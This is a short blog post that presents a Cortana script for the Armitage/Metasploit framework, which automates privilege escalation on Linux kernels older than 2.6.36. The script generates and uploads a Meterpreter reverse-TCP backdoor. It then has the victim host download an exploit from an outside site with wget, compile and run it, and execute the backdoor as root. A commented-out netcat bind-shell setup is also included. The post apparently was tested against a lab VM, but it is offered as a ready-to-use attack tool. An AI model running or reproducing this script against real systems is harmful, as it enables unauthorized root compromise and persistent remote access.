Posted by Security is just an illusion at Wednesday, January 22, 2014
Read our previous post
Here I wrote some very simple Cortana Auto Rooting Kernel < 2.6.36 Script.
Tested on Hackademic.RTB1 : Demo
# Auto Rooting < 2.6.36 Menu for Cobalt Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de
#debug(7);
popup shell {
if (host_os(session_host($1)) eq "Linux") {
menu "Auto Rooting" {
item "Auto Rooting < 2.6.36" {
println("Auto Rooting");
# Generate Payload
$r_lport = random_port();
$backdoor = generate("linux/x86/meterpreter/reverse_tcp", lhost(), $r_lport, %(), "elf");
$handle2 = openf(">/tmp/linux_backdoor_$r_lport");
writeb($handle2, $backdoor);
closef($handle2);
shell_upload($1, "/tmp/linux_backdoor_$r_lport", "/tmp/linux_backdoor_$r_lport");
# Launch our aux shells
handler("linux/x86/meterpreter/reverse_tcp", $r_lport, %(LHOST => lhost()));
# Rooting
s_cmd($1, "wget http://downloads.securityfocus.com/vulnerabilities/exploits/44219.c");
s_cmd($1, "gcc 44219.c -o rootme_1");
s_cmd($1, "chmod +x rootme_1");
s_cmd($1, "chmod 0777 rootme_1");
s_cmd($1, "./rootme_1");
sleep(10 * 1000);
s_cmd($1, "chmod +x /tmp/linux_backdoor_$r_lport");
s_cmd($1, "chmod 0777 /tmp/linux_backdoor_$r_lport");
s_cmd($1, "chown root:root /tmp/linux_backdoor_$r_lport");
s_cmd($1, "/tmp/linux_backdoor_$r_lport");
s_cmd($1, "exit");
db_sync();
#s_cmd($1, "nc -lvp 31337");
#cmd($console, "use exploit/multi/handler");
#cmd($console, "set LPORT 31337");
#$host = session_host($1);
#cmd($console, "set RHOST $host");
#cmd($console, "set PAYLOAD cmd/unix/bind_netcat");
#cmd($console, "set ExitOnSession false");
#cmd($console, "exploit -j");
}
}
}
}
Have pfun
No comments:
Post a Comment